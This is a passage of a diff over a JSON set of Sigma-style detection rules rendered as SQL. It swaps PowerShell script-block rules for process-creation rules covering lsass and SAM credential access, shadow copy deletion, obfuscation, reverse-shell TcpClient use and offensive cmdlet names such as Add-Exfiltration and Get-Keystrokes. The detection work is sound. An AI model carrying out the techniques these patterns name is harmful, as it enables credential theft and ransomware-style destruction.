lsass process, which is in almost all cases a sign of malicious activity", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "status": "experimental", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "status": "test", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\' OR Image LIKE '%.scr' ESCAPE '\\')) AND NOT ((Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\'))) AND NOT ((Image IN ('-', '')) OR (Image = '') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "status": "experimental", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' 